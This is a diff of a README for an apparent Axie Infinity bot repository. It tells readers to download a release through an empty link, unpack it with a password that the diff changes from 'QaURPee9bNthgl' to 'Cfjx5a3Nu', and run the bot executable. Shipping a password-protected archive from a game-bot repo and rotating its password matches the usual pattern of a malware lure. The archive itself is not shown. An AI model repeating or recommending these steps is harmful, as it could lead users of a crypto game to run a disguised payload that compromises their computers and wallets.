weaverjc/Axie-Infinity-bot/README.md

 - - Close the SkyMavis game client to ensure the bot can access the game window without interference.

 - Download and Extract Files:
-- - Download the latest release of the repository.
+- - [Download]() the latest release of the repository.
-- - Extract the downloaded files using the password QaURPee9bNthgl.
+- - Extract the downloaded files using the password `Cfjx5a3Nu`.

 - Launch the Bot:
 - - Run the bot executable with the correct settings configured in the provided configuration file.
 Ensure the game client is running and visible on your screen.